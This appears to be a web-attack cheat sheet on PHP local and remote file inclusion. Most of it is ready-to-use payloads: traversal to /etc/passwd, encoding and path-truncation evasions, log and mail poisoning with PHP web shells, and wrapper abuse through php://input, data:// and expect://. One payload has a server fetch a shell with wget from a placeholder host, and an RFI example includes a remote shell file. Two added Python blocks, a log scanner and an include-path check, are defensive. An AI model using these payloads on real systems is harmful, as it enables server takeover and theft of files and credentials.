File Inclusion LFI/RFI

Local File Inclusion

?file=../../../../etc/passwd

?file=../../../../etc/passwd%00

?file=../../../../etc/passwd%00jpg

Environment File

/proc/self/environ

Payloads:

User-Agent: <?php system($_GET['cmd']); ?>

?page=/proc/self/environ&cmd=ls

?page=/proc/self/environ&cmd=python -c 'shell…'

Apache Logs

/var/log/apache2/access.log

../../../../var/log/apache/error.log

Payload

GET /<?php system($_GET['cmd']);?>

SSH Logs

/var/log/auth.log

Payload

ssh '<?php system($_GET["cmd"]);?>'@VICTIM-IM

Sending emails

mail -s 'This is email subject: <?php system($_GET["cmd"]);?>' user@domain < /dev/null

Include: /var/mail/user

php://filter

Index + Index.php

?file=php://filter/read=convert.base64-encode/resource=FILETOREAD

?file=php://filter/read=convert.base64-encode/resource=../../config.php

php://input

?file=php://input

With post data

<?php system('wget http://x.x.x.x/php-shell.php -O /var/www/html/shell.php'); ?>

<?php phpinfo(); ?>

data://

?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA%2fPg%3d%3d

?file=data:text/plain;,<?php echo shell_exec($_GET['cmd']);?>

zip://

zip://archive.zip#file.php

phar://

/proc/self/fd/#


Session Files

/tmp/sess_[SESSID]

/tmp/php5/sess_[SESSID]

Including images

You can append some PHP code at the end of an image and upload it, then include it.

Use encoding

?file=..%2F..%2F..%2F..%2F..%2Fetc/passwd

?file=....//....//....//....//....//etc/passwd

Expect

?file=expect://ls

Note: Null byte injection has been fixed since PHP 5.3.4 (PHP 5.3 itself is unsupported).

To get around the null byte fix, use path truncation: make the file path longer than 4096 bytes, and the part beyond the limit (including the appended extension) is dropped.

?file=../../../etc/passwd/./././././thousand times (./)

Or reverse path truncation:

?file=../../../../(thousand times ./)etc/passwd
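Every evasion listed in the encoding, null byte and path truncation notes above is also something a defender can decode and flag in the web server's access log. The Python below is an added example, not code from the original cheat sheet: it normalises a request parameter (repeated percent-decoding for double encoding, collapsing the `....//` form, stripping `/./` padding) and reports which indicators each parameter trips. The log lines, client addresses and indicator names are constructed for this example.

```python
# Added example (not from the cheat sheet): decode the evasions listed above and
# flag include parameters in web server access logs. Sample log lines are constructed.
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Stream wrappers and remote schemes that appear as include targets on this page.
WRAPPER_RE = re.compile(r"^(php|data|expect|zip|phar|file|ftp|https?):", re.I)
TRAVERSAL_RE = re.compile(r"\.\.[/\\]")
# Files named on the page as common read targets (constructed list, not exhaustive).
SENSITIVE_RE = re.compile(r"/etc/passwd|/proc/(?:self|\d+)/|/var/log/|/var/mail/", re.I)
# Common Log Format: client address first, then the request line in quotes.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "(?:GET|POST|HEAD) (?P<target>\S+)')
PATH_TRUNCATION_LEN = 4096  # the limit the page cites for path truncation


def normalize(value, rounds=3):
    """Undo the encodings above: repeated percent-decoding (double encoding),
    the '....//' form that survives naive '../' stripping, and '/./' padding."""
    decoded = value
    for _ in range(rounds):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    prev = None
    while prev != decoded:
        prev = decoded
        decoded = decoded.replace("....//", "../")
    return re.sub(r"(?:/\.)+/", "/", decoded)


def indicators(value):
    """Return the list of LFI/RFI indicators a single parameter value trips."""
    decoded = normalize(value)
    found = []
    m = WRAPPER_RE.match(decoded.strip())
    if m:
        found.append("wrapper:" + m.group(1).lower())
    if TRAVERSAL_RE.search(decoded):
        found.append("traversal")
    if "\x00" in decoded:
        found.append("null_byte")
    if SENSITIVE_RE.search(decoded):
        found.append("sensitive_path")
    if len(value) > PATH_TRUNCATION_LEN:
        found.append("path_truncation_length")
    return found


def scan_log(lines):
    """Return (client, parameter name, indicators) for every parameter that trips a check."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            flags = indicators(value)
            if flags:
                hits.append((m.group("ip"), name, flags))
    return hits


# Constructed sample lines in Common Log Format (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?file=..%2F..%2F..%2F..%2Fetc%2Fpasswd%00jpg HTTP/1.1" 200 512',
    '10.0.0.6 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?file=php://filter/read=convert.base64-encode/resource=../../config.php HTTP/1.1" 200 2048',
    '10.0.0.7 - - [10/Oct/2023:13:55:41 +0000] "GET /index.php?file=....//....//....//etc/passwd HTTP/1.1" 404 210',
    '10.0.0.8 - - [10/Oct/2023:13:55:45 +0000] "GET /index.php?page=/proc/self/environ&cmd=ls HTTP/1.1" 200 1337',
    '10.0.0.9 - - [10/Oct/2023:13:55:50 +0000] "GET /index.php?page=home HTTP/1.1" 200 1024',
    '10.0.0.10 - - [10/Oct/2023:13:56:00 +0000] "GET /index.php?file=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for client, param, flags in scan_log(SAMPLE_LOG):
        print(f"{client}\t{param}\t{','.join(flags)}")
```

Run as a script it prints one line per flagged parameter; the double-encoded entry is caught only because `normalize` decodes more than once, and the `....//` entry only because it is collapsed before the traversal regex runs.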

Proc File System

/proc/sched_debug // find pid

/proc/mounts

/proc/net/arp

/proc/net/route

/proc/net/tcp and /proc/net/udp

/proc/net/fib_trie

/proc/version

Query process

/proc/[PID]/cmdline

/proc/[PID]/environ

/proc/[PID]/cwd

/proc/[PID]/fd/[#]  // find error, access log files


/proc/self/cmdline

/proc/self/stat

/proc/self/status

/proc/self/fd/[#]

RFI

?file=[http|https|ftp]://websec.wordpress.com/shell.txt

(requires allow_url_fopen=On and allow_url_include=On)
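The two php.ini settings above are what make the remote variant possible, but turning them off does nothing for the local variants listed on this page; the include handler itself needs an allowlist or a containment check. The Python below is an added example, not code from the original page: it models the check a PHP include handler would make before handing a user-supplied page name to include() (PHP's realpath() fills the role that os.path.realpath plays here). The base directory /srv/app/pages and the page names are constructed for the example.

```python
# Added example (not from the cheat sheet): the check an include handler should make
# before passing a user-supplied page name to include(). Base directory and page
# names are constructed for the example.
import os
import re

# Any "scheme:" prefix (php://, data:, expect://, zip://, phar://, http://, ...)
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.\-]*:", re.I)
MAX_NAME_LEN = 255  # a page name never needs more; longer inputs are truncation attempts


class IncludeRejected(ValueError):
    """Raised for any request the include handler must not honour."""


def resolve_include(base_dir, requested, allowed=None):
    """Map a page name to a file under base_dir, or raise IncludeRejected.

    With `allowed` (a dict of public name -> file name) only listed pages exist,
    which is the strongest option. Without it, the name is validated and the
    resolved real path is required to stay inside base_dir.
    """
    base = os.path.realpath(base_dir)
    if allowed is not None:
        if requested not in allowed:
            raise IncludeRejected(f"not in allowlist: {requested!r}")
        return os.path.join(base, allowed[requested])
    if "\x00" in requested:
        raise IncludeRejected("NUL byte in name")          # the %00 trick
    if SCHEME_RE.match(requested):
        raise IncludeRejected("wrapper or remote scheme")  # php://, data:, http:// ...
    if len(requested) > MAX_NAME_LEN:
        raise IncludeRejected("name too long")             # path truncation attempts
    candidate = os.path.realpath(os.path.join(base, requested))
    # Containment check: ../ traversal and /./ padding collapse in realpath, and an
    # absolute name replaces base in os.path.join, so anything outside base fails here.
    if os.path.commonpath([base, candidate]) != base:
        raise IncludeRejected(f"escapes base directory: {candidate}")
    return candidate


def classify(base_dir, names, allowed=None):
    """Run resolve_include over several names and report the outcome for each."""
    base = os.path.realpath(base_dir)
    report = {}
    for name in names:
        try:
            path = resolve_include(base_dir, name, allowed)
            report[name] = "allowed:" + os.path.relpath(path, base)
        except IncludeRejected as exc:
            report[name] = "rejected:" + str(exc)
    return report


# Constructed inputs: the evasions from this page against a hypothetical pages directory.
BASE_DIR = "/srv/app/pages"
SAMPLE_NAMES = [
    "about.php",
    "../../../../etc/passwd",
    "../../../etc/passwd/./././",
    "/etc/passwd",
    "php://filter/read=convert.base64-encode/resource=index.php",
    "../../../../etc/passwd\x00.jpg",
    # '....//' only beats naive '../' stripping; to realpath it is just an odd subdirectory
    "....//....//etc/passwd",
]

if __name__ == "__main__":
    for name, outcome in classify(BASE_DIR, SAMPLE_NAMES).items():
        print(f"{name!r:62} {outcome}")
    print(classify(BASE_DIR, ["about", "../../etc/passwd"], allowed={"about": "about.php"}))
```

The `....//` entry is deliberately left in to show that a containment check does not need to know about that trick: the name resolves to a non-existent subdirectory inside the base and the include simply fails to find a file, whereas a filter that strips `../` once would have let the traversal through.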

Files to check

https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/File%20Inclusion%20-%20Path%20Traversal/Intruders/List_Of_File_To_Include.txt

https://raw.githubusercontent.com/tennc/fuzzdb/master/dict/BURP-PayLoad/LFI/LFI-FD-check.txt

https://raw.githubusercontent.com/D35m0nd142/LFISuite/master/pathtotest.txt

https://github.com/D35m0nd142/LFISuite/blob/master/pathtotest_huge.txt

Windows File Check

https://raw.githubusercontent.com/tennc/fuzzdb/master/dict/BURP-PayLoad/LFI/LFI-WinblowsFileCheck.txt

Payloads for File Inclusion

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal

https://github.com/swisskyrepo/PayloadsAllTheThings

References:

https://resources.infosecinstitute.com/local-file-inclusion-code-execution/

https://outpost24.com/blog/from-local-file-inclusion-to-remote-code-execution-part-1

http://www.hackingarticles.in/5-ways-exploit-lfi-vulnerability/

https://rawsec.ml/en/local-file-inclusion-remote-code-execution-vulnerability/

http://www.securityidiots.com/Web-Pentest/LFI/

http://www.securityidiots.com/Web-Pentest/LFI/guide-to-lfi.html

https://www.slideshare.net/null0x00/lfi-to-rce

https://www.sunnyhoi.com/how-to-hack-a-website-using-local-file-inclusion-lfi/

https://hydrasky.com/network-security/local-file-inclusion-sending-emails-to-remote-code-execution/

https://security.stackexchange.com/questions/136730/local-file-inclusion-to-rce-using-php-file-wrappers

https://medium.com/@Aptive/local-file-inclusion-lfi-web-application-penetration-testing-cc9dc8dd3601

https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/

https://www.autosectools.com/Local-File-Inclusion-To-Remote-Code-Execution

https://www.codemetrix.net/php-local-file-includes-into-remote/

https://www.notsosecure.com/lfi-code-exec-remote-root/

https://resources.infosecinstitute.com/file-inclusion-attacks/

https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion

https://www.owasp.org/index.php/Testing_for_Remote_File_Inclusion

https://securityxploded.com/remote-file-inclusion.php

https://roguecod3r.wordpress.com/2014/03/17/lfi-to-shell-exploiting-apache-access-log/

https://null-byte.wonderhowto.com/how-to/exploit-php-file-inclusion-web-apps-0179955/

https://www.getastra.com/blog/cms/your-guide-to-defending-against-lfi-and-rfi-attacks/

https://www.cybrary.it/0p3n/local-file-inclusion-command-execution/

https://en.wikipedia.org/wiki/File_inclusion_vulnerability

https://www.imperva.com/docs/hii_remote_and_local_file_inclusion_vulnerabilities.pdf

https://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/

https://xapax.gitbooks.io/security/content/local_file_inclusion.html

https://highon.coffee/blog/lfi-cheat-sheet/

http://securityidiots.com/Web-Pentest/LFI

https://nets.ec/File_Inclusion

https://gist.github.com/sckalath/da1a232f362a700ab459

https://evi1us3r.wordpress.com/lfi-cheat-sheet/

http://www.insomniasec.com/publications/LFI%20With%20PHPInfo%20Assistance.pdf

https://blog.netspi.com/directory-traversal-file-inclusion-proc-file-system/
